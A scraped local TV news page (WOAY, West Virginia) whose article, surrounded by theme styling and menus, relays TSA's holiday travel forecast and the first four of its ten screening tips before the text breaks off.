                    }
                    .tdi_34.tdc-row-content-vert-bottom,
                    .tdi_34.tdc-row-content-vert-bottom .tdc-inner-columns {
                        display: flex;
                        align-items: flex-end;
                        flex: 1;
                    }
                    .tdi_34.tdc-row-content-vert-center .td_block_wrap {
                        vertical-align: middle;
                    }
                    .tdi_34.tdc-row-content-vert-bottom .td_block_wrap {
                        vertical-align: bottom;
                    }
                }
/* inline tdc_css att */

.tdi_34{
padding-top:28px !important;
padding-bottom:9px !important;
}

.tdi_34 .td_block_wrap{ text-align:left }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_34{
margin-bottom:-3px !important;
padding-top:9px !important;
padding-bottom:0px !important;
}
}

</style><div class="vc_column_inner tdi_36  wpb_column vc_column_container tdc-inner-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_36{
                    vertical-align: baseline;
                }.tdi_36 .vc_column-inner > .wpb_wrapper,
				.tdi_36 .vc_column-inner > .wpb_wrapper .tdc-elements{
				    display: block;
				}.tdi_36 .vc_column-inner > .wpb_wrapper .tdc-elements{
				    width: 100%;
				}
/* inline tdc_css att */

.tdi_36{
width:30% !important;
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_36{
width:24% !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_36{
width:calc(100% - 468px) !important;
}
}

</style><div class="vc_column-inner"><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo tdi_37 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_37" >
<style>
/* custom css */
.tdi_37 .tdb-logo-a,
                .tdi_37 h1{
                    flex-direction: row;
                
                    align-items: center;
                
                    justify-content: center;
                }.tdi_37 .tdb-logo-svg-wrap{
                    display: block;
                }.tdi_37 .tdb-logo-svg-wrap + .tdb-logo-img-wrap{
                    display: none;
                }.tdi_37 .tdb-logo-img-wrap{
                    display: block;
                }.tdi_37 .tdb-logo-text-tagline{
                    margin-top: 2px;
                    margin-left: 0;
                
                    display: block;
                }.tdi_37 .tdb-logo-text-title{
                    display: block;
                }.tdi_37 .tdb-logo-text-wrap{
                    flex-direction: column;
                
                    align-items: flex-start;
                }.tdi_37 .tdb-logo-icon{
                    top: 0px;
                
                    display: block;
                }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_37 .tdb-logo-img{
                    max-width: 220px;
                }
}
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://woay.com/"><span class="tdb-logo-img-wrap"><img class="tdb-logo-img td-retina-data" data-retina="https://woay.com/wp-content/uploads/2020/03/WOAY-972-X-333.png" src="https://woay.com/wp-content/uploads/2020/03/WOAY-272-X-90.png" alt="WOAY News"  title="WOAY News"  /></span></a></div></div> <!-- ./block --></div></div></div><div class="vc_column_inner tdi_39  wpb_column vc_column_container tdc-inner-column td-pb-span8">
<style scoped>

/* custom css */
.tdi_39{
                    vertical-align: baseline;
                }.tdi_39 .vc_column-inner > .wpb_wrapper,
				.tdi_39 .vc_column-inner > .wpb_wrapper .tdc-elements{
				    display: block;
				}.tdi_39 .vc_column-inner > .wpb_wrapper .tdc-elements{
				    width: 100%;
				}
/* inline tdc_css att */

.tdi_39{
width:70% !important;
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_39{
width:76% !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_39{
width:468px !important;
}
}

</style><div class="vc_column-inner"><div class="wpb_wrapper"><div class="td-a-rec td-a-rec-id-header  tdi_40 td_block_template_1">
<style>

/* inline tdc_css att */

.tdi_40{
margin-bottom:0px !important;
}

/* phone */
@media (max-width: 767px)
{
.tdi_40{
justify-content:center !important;
text-align:center !important;
}
}

</style>
<style>
/* custom css */
.tdi_40.td-a-rec{
					text-align: center;
				}.tdi_40 .td-element-style{
					z-index: -1;
				}.tdi_40.td-a-rec-img{
				    text-align: right;
				}.tdi_40.td-a-rec-img img{
                    margin: 0 0 0 auto;
                }@media (max-width: 767px) {
				    .tdi_40.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><div class="g g-2"><div class="g-single a-39"><a class="gofollow" data-track="MzksMiwxLDYw" href="https://wvlottery.com/customer-service/find-a-retailer/?utm_source=tv&utm_medium=digitalad&utm_campaign=TinyHomes22&utm_term=find+a+retailer&utm_content=728x90"><img src="https://i0.wp.com/woay.com/wp-content/uploads/2022/09/unnamed.jpg?ssl=1" /></a></div></div></div></div></div></div></div><div class="vc_row_inner tdi_42  vc_row vc_inner wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_42{
                    position: relative !important;
                    top: 0;
                    transform: none;
                    -webkit-transform: none;
                }.tdi_42,
				.tdi_42 .tdc-inner-columns{
				    display: block;
				}.tdi_42 .tdc-inner-columns{
				    width: 100%;
				}
</style><div class="vc_column_inner tdi_44  wpb_column vc_column_container tdc-inner-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_44{
                    vertical-align: baseline;
                }.tdi_44 .vc_column-inner > .wpb_wrapper,
				.tdi_44 .vc_column-inner > .wpb_wrapper .tdc-elements{
				    display: block;
				}.tdi_44 .vc_column-inner > .wpb_wrapper .tdc-elements{
				    width: 100%;
				}
</style><div class="vc_column-inner"><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_menu tdi_45 tds_menu_active1 tds_menu_sub_active1 tdb-head-menu-inline tdb-mm-align-screen td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_45"  style=" z-index: 999;">
<style>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</style>
<style>
.tdi_45 .tdb-menu > li > a:after,
				.tdi_45 .tdb-menu-items-dropdown .td-subcat-more:after{
					background-color: #dd3333;
				
					bottom: 0px;
				}
</style>
<style>

</style><div id=tdi_45 class="td_block_inner td-fix-index"><div class="tdb-main-sub-icon-fake"><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></div><div class="tdb-sub-icon-fake"><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></div><ul id="menu-main-1" class="tdb-block-menu tdb-menu tdb-menu-items-visible"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-first tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-107959 tdb-menu-item-inactive"><a href="https://woay.com/2022-election/"><div class="tdb-menu-item-text">2022 Election</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-post tdb-menu-item tdb-normal-menu menu-item-107958"><a href="https://woay.com/local-election-results-2022/"><div class="tdb-menu-item-text">Local Election Results</div></a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-post tdb-menu-item tdb-normal-menu menu-item-107957"><a href="https://woay.com/wv-state-election-results-2022/"><div class="tdb-menu-item-text">WV State Election Results</div></a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-post tdb-menu-item tdb-normal-menu menu-item-107956"><a href="https://woay.com/national-election-results-2022/"><div class="tdb-menu-item-text">National Election Results</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-77747"><a href="https://woay.com/"><div class="tdb-menu-item-text">Home</div></a></li>
<li class="color-2 menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-39414 tdb-menu-item-inactive"><a href="https://woay.com/news/"><div class="tdb-menu-item-text">News</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-40309"><a href="https://woay.com/news/breaking/"><div class="tdb-menu-item-text">Breaking</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39179"><a href="https://woay.com/news/crime/"><div class="tdb-menu-item-text">Crime</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-58733"><a href="https://woay.com/news/local/"><div class="tdb-menu-item-text">Local</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39185"><a href="https://woay.com/news/state/"><div class="tdb-menu-item-text">State</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent tdb-menu-item tdb-normal-menu menu-item-39182"><a href="https://woay.com/news/national/"><div class="tdb-menu-item-text">National</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-65566"><a href="https://woay.com/news/virginia-news/"><div class="tdb-menu-item-text">Virginia News</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39180"><a href="https://woay.com/news/international/"><div class="tdb-menu-item-text">International</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39184"><a href="https://woay.com/news/politics/"><div class="tdb-menu-item-text">Politics</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-69554"><a href="https://woay.com/news/missing-persons/"><div class="tdb-menu-item-text">Missing Persons</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-78096"><a href="https://woay.com/news/weather/"><div class="tdb-menu-item-text">Weather News</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-39181 tdb-menu-item-inactive"><a href="https://woay.com/news/local/"><div class="tdb-menu-item-text">News By County</div><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-73773"><a href="https://woay.com/tag/fayette/"><div class="tdb-menu-item-text">Fayette County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-81133"><a href="https://woay.com/tag/greenbrier/"><div class="tdb-menu-item-text">Greenbrier County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-57361"><a href="https://woay.com/tag/raleigh/"><div class="tdb-menu-item-text">Raleigh County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-80564"><a href="https://woay.com/tag/mcdowell-county/"><div class="tdb-menu-item-text">McDowell County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-79958"><a href="https://woay.com/tag/mercer/"><div class="tdb-menu-item-text">Mercer County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-70375"><a href="https://woay.com/tag/monroe/"><div class="tdb-menu-item-text">Monroe County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-57366"><a href="https://woay.com/tag/nicholas/"><div class="tdb-menu-item-text">Nicholas County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-70373"><a href="https://woay.com/tag/summers/"><div class="tdb-menu-item-text">Summers County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-80566"><a href="https://woay.com/tag/tazewell-county/"><div class="tdb-menu-item-text">Tazewell County</div></a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-post_tag tdb-menu-item tdb-normal-menu menu-item-80560"><a href="https://woay.com/tag/wyoming-county/"><div class="tdb-menu-item-text">Wyoming County</div></a></li>
	</ul>
</li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-81318 tdb-menu-item-inactive"><a href="https://woay.com/coronavirus/"><div class="tdb-menu-item-text">Coronavirus</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-86285"><a href="https://woay.com/covid-19-cases/"><div class="tdb-menu-item-text">COVID-19 Cases</div></a></li>
</ul>
</li>
<li class="color-7 menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-39186 tdb-menu-item-inactive"><a href="https://woay.com/stormwatch-weather/"><div class="tdb-menu-item-text">Weather</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-61245"><a href="https://woay.com/closings-delays/"><div class="tdb-menu-item-text">Closings &#038; Delays</div></a></li>
</ul>
</li>
<li class="color-4 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-39188 tdb-menu-item-inactive"><a href="https://woay.com/sports-news/sports/"><div class="tdb-menu-item-text">Sports</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39190"><a href="https://woay.com/sports-news/"><div class="tdb-menu-item-text">Sports News</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39189"><a href="https://woay.com/sports-news/sports-features/"><div class="tdb-menu-item-text">Sports Features</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39192"><a href="https://woay.com/sports-news/wvu/"><div class="tdb-menu-item-text">WVU</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39193"><a href="https://woay.com/sports-news/marshall/"><div class="tdb-menu-item-text">Marshall</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39191"><a href="https://woay.com/sports-news/virginia-tech/"><div class="tdb-menu-item-text">Virginia Tech</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-78071 tdb-menu-item-inactive"><a href="https://woay.com/video/"><div class="tdb-menu-item-text">Video</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-88088"><a href="https://woay.com/medical-watch/"><div class="tdb-menu-item-text">Medical Watch</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-78213"><a href="https://woay.com/one-tank-trip/"><div class="tdb-menu-item-text">One Tank Trip</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-39195"><a href="https://woay.com/tv-guide/"><div class="tdb-menu-item-text">TV Guide</div></a></li>
<li class="color-7 menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-39201"><a href="https://woay.com/contact-us/"><div class="tdb-menu-item-text">Contact Us</div></a></li>
<li class="color-10 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-39196 tdb-menu-item-inactive"><a><div class="tdb-menu-item-text">About Us</div><i class="tdb-sub-menu-icon td-icon-down tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-39197"><a href="https://woay.com/news-team/"><div class="tdb-menu-item-text">News Team</div></a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-39198"><a href="https://woay.com/advertise-with-us/"><div class="tdb-menu-item-text">Advertise With Us!</div></a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-39199"><a href="https://woay.com/history-of-woay/"><div class="tdb-menu-item-text">History of WOAY</div></a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-39200"><a href="https://woay.com/careers-at-woay/"><div class="tdb-menu-item-text">Careers at WOAY</div></a></li>
</ul>
</li>
</ul></div></div><div class="td_block_wrap tdb_header_search tdi_48 tdb-header-search-trigger-enabled td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_48" >
<style>

/* inline tdc_css att */

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_48{
margin-top:1px !important;
}
}

</style>
<style>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</style><div class="tdb-block-inner td-fix-index"><div class="tdb-drop-down-search" aria-labelledby="td-header-search-button"><div class="tdb-drop-down-search-inner"><form method="get" class="tdb-search-form" action="https://woay.com/"><div class="tdb-search-form-inner"><input class="tdb-head-search-form-input" placeholder=" " type="text" value="" name="s" autocomplete="off" /><input type="hidden" value="post" name="post_type" /><button class="wpb_button wpb_btn-inverse btn tdb-head-search-form-btn" type="submit"><span>Search</span><i class="tdb-head-search-form-btn-icon td-icon-menu-right"></i></button></div></form><div class="tdb-aj-search"></div></div></div><a href="#" role="button" aria-label="Search" class="tdb-head-search-btn dropdown-toggle" data-toggle="dropdown"><span class="tdb-search-icon tdb-search-icon-svg" ><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024"><path d="M946.371 843.601l-125.379-125.44c43.643-65.925 65.495-142.1 65.475-218.040 0.051-101.069-38.676-202.588-115.835-279.706-77.117-77.148-178.606-115.948-279.644-115.886-101.079-0.061-202.557 38.738-279.665 115.876-77.169 77.128-115.937 178.627-115.907 279.716-0.031 101.069 38.728 202.588 115.907 279.665 77.117 77.117 178.616 115.825 279.665 115.804 75.94 0.020 152.136-21.862 218.061-65.495l125.348 125.46c30.915 30.904 81.029 30.904 111.954 0.020 30.915-30.935 30.915-81.029 0.020-111.974zM705.772 714.925c-59.443 59.341-136.899 88.842-214.784 88.924-77.896-0.082-155.341-29.583-214.784-88.924-59.443-59.484-88.975-136.919-89.037-214.804 0.061-77.885 29.604-155.372 89.037-214.825 59.464-59.443 136.878-88.945 214.784-89.016 77.865 0.082 155.3 29.583 214.784 89.016 59.361 59.464 88.914 136.919 88.945 214.825-0.041 77.885-29.583 155.361-88.945 214.804z"></path></svg></span></a></div></div> <!-- ./block --></div></div></div></div></div></div></div></div></div></div>                    </div>
                                <div class="td-header-desktop-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none">
                    <div id="tdi_49" class="tdc-zone"><div class="tdc_zone tdi_50  wpb_row td-pb-row" data-sticky-offset="0" >
<style scoped>

/* custom css */
.tdi_50{
                    min-height: 0;
                }.td-header-desktop-sticky-wrap.td-header-active{
                    opacity: 1;
                }
</style><div id="tdi_51" class="tdc-row"><div class="vc_row tdi_52  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_52,
                .tdi_52 .tdc-columns{
                    min-height: 0;
                }.tdi_52,
				.tdi_52 .tdc-columns{
				    display: block;
				}.tdi_52 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_54  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_54{
                    vertical-align: baseline;
                }.tdi_54 > .wpb_wrapper,
				.tdi_54 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_54 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_54 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_54 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"></div></div></div></div></div></div>                </div>
            </div>
            
    <div class="td-main-content-wrap td-container-wrap">

        <div class="td-container td-post-template-default ">
            <div class="td-crumb-container"></div>

            <div class="td-pb-row">
                                        <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-108441" class="post-108441 post type-post status-publish format-standard has-post-thumbnail category-featured category-national category-news" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header">

            <!-- category -->
            <header class="td-post-title">
                <h1 class="entry-title">TSA prepared for winter holiday travelers</h1>
                

                <div class="td-module-meta-info">
                    <!-- author --><div class="td-post-author-name"><div class="td-author-by">By</div> <a href="https://woay.com/author/blawrencewoay/">Brandy Lawrence</a><div class="td-author-line"> - </div> </div>                    <!-- date --><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-12-20T11:11:03-05:00" >December 20, 2022 11:11 am</time></span>                    <!-- comments -->                    <!-- views -->                </div>

            </header>

        </div>

        <div class="td-post-sharing-top"><div id="td_social_sharing_article_top" class="td-post-sharing td-ps-bg td-ps-notext td-ps-bar td-post-sharing-style5 ">
		<style>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</style>

		<div class="td-post-sharing-visible"><div class="td-social-sharing-button td-social-sharing-button-js td-social-handler td-social-share-text">
                                        <div class="td-social-but-icon"><i class="td-icon-share"></i></div>
                                        <div class="td-social-but-text">Share</div>
                                    </div><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwoay.com%2Ftsa-prepared-for-winter-holiday-travelers%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=TSA+prepared+for+winter+holiday+travelers&url=https%3A%2F%2Fwoay.com%2Ftsa-prepared-for-winter-holiday-travelers%2F&via=WOAY-TV" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-print" href="#" title="Print" ><div class="td-social-but-icon"><i class="td-icon-print"></i></div><div class="td-social-but-text">Print</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-mail" href="mailto:?subject=TSA prepared for winter holiday travelers&body=https://woay.com/tsa-prepared-for-winter-holiday-travelers/" title="Email" ><div class="td-social-but-icon"><i class="td-icon-mail"></i></div><div class="td-social-but-text">Email</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://woay.com/tsa-prepared-for-winter-holiday-travelers/&amp;media=https://woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg&description=TSA expects airport security checkpoints nationwide to be busier this holiday travel season than last year" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-reddit" href="https://reddit.com/submit?url=https://woay.com/tsa-prepared-for-winter-holiday-travelers/&title=TSA+prepared+for+winter+holiday+travelers" title="ReddIt" ><div class="td-social-but-icon"><i class="td-icon-reddit"></i></div><div class="td-social-but-text">ReddIt</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-viber" href="viber://forward?text=TSA+prepared+for+winter+holiday+travelers https://woay.com/tsa-prepared-for-winter-holiday-travelers/" title="Viber" ><div class="td-social-but-icon"><i class="td-icon-viber"></i></div><div class="td-social-but-text">Viber</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_top" title="More">
                                    <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
                                </a></div></div></div>
        <div class="td-post-content tagdiv-type">
            <!-- image --><div class="td-post-featured-image"><a href="https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?fit=1280%2C720&ssl=1" data-caption=""><img width="696" height="392" class="entry-thumb td-modal-image" src="https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=696%2C392&ssl=1" srcset="https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?w=1280&ssl=1 1280w, https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=300%2C169&ssl=1 300w, https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=1024%2C576&ssl=1 1024w, https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=768%2C432&ssl=1 768w, https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=696%2C392&ssl=1 696w, https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=1068%2C601&ssl=1 1068w, https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?resize=747%2C420&ssl=1 747w" sizes="(max-width: 696px) 100vw, 696px" alt="" title="11014L00-HHIFW"/></a></div>
            <!-- content --><p>Oak Hill, WV (WOAY) &#8211; The Transportation Security Administration (TSA) expects airport security checkpoints nationwide to be busier this holiday travel season than last year.</p>
<p>TSA anticipates travel volumes to be close to pre-pandemic levels and forecasts the busiest days to be Thursday, December 22, and Friday, December 30.</p>
<p>Travelers should keep these top 10 tips in mind while traveling:</p>
<ol>
<li><strong>Do not attempt to bring a firearm through a TSA checkpoint;</strong> doing so compromises the safety and security of other passengers and our officers at the checkpoint. Passengers who do attempt to bring a firearm through a checkpoint can expect to receive a civil penalty (fines may be as high as $15,000) and lose eligibility for TSA PreCheck. Additionally, local law enforcement will be called, and because these passengers may present additional risk beyond the firearm, they will receive enhanced screening.</li>
</ol>
<ol start="2">
<li><strong>Beyond firearms, other items are not permitted at the checkpoint.</strong> These include explosives, flammables, knives, razors, and replica weapons. To see if an item is prohibited, check the <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDQsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3d3dy50c2EuZ292L3RyYXZlbC9zZWN1cml0eS1zY3JlZW5pbmcvd2hhdGNhbmlicmluZy9hbGwifQ.-beyHHZcFWGIs6XZmYFOhKqdYzteVJ8yjE2GyifXCGs/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="4">TSA website under “What Can I Bring?”</a> Prepare for security when packing for your trip, and be aware of what can go in carry-on or checked bags to ensure there are no prohibited items. If you can spill, spray, spread, pump, or pour it, then it is subject to the 3.4-ounce limitation. Passengers may always bring solid foods such as cakes and baked goods through the TSA checkpoint.</li>
</ol>
<ol start="3">
<li><strong>Ensure gifts are unwrapped and can be inspected.</strong> TSA encourages those traveling with gifts this holiday season to use gift bags that can be easily opened or gift boxes with lids that can be removed, so that contents can be inspected if required. Fully wrapped gifts may need to be opened if deemed necessary by a TSA officer. Instead, consider placing your unwrapped gifts in your checked bag.</li>
</ol>
<ol start="4">
<li><strong>Bring an acceptable ID.</strong> Before heading to the airport, travelers should ensure they have <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDUsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3VybGRlZmVuc2UudXMvdjMvX19odHRwczovbG5rcy5nZC9sL2V5SmhiR2NpT2lKSVV6STFOaUo5LmV5SmlkV3hzWlhScGJsOXNhVzVyWDJsa0lqb3hNRFlzSW5WeWFTSTZJbUp3TWpwamJHbGpheUlzSW1KMWJHeGxkR2x1WDJsa0lqb2lNakF5TWpFeE1UY3VOalk0TWpJeE9ERWlMQ0oxY213aU9pSm9kSFJ3Y3pvdkwzZDNkeTUwYzJFdVoyOTJMM1J5WVhabGJDOXpaV04xY21sMGVTMXpZM0psWlc1cGJtY3ZhV1JsYm5ScFptbGpZWFJwYjI0aWZRLlNtVGs1WVdJTHktdlBua29tM1pJN2lrV1FadzNSYXBNZ1o2NkdGTVBZYXcvcy8yODkwMTE4MTEwL2JyLzE0ODQxODI0MzU5MC1sX187ISFCQ2xSdU9WNWN2dGJ1TkkhU0o3d1JJMV90N1FtdmxITFFnRUYzYlBwOThwaEdlLXBkVTFVZmxpU2xhUlFMV0VlTVlidFUxdmFVa21PVC1RVFhWMmVzbnZWJTI0In0._J2ysYSMpUbjhjjAgOqoBI12RMHh-AfVhZhze1bmEp8/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="5">proper identification</a>. At many airport checkpoints, the Transportation Security Officer (TSO) may ask you to insert your physical ID into one of our new Credential Authentication Technology units. Residents of Arizona, Colorado, and Maryland may even use their Apple mobile device to store their ID in Apple Wallet and use their mobile device in specific TSA PreCheck lanes at participating airports.</li>
</ol>
<ol start="5">
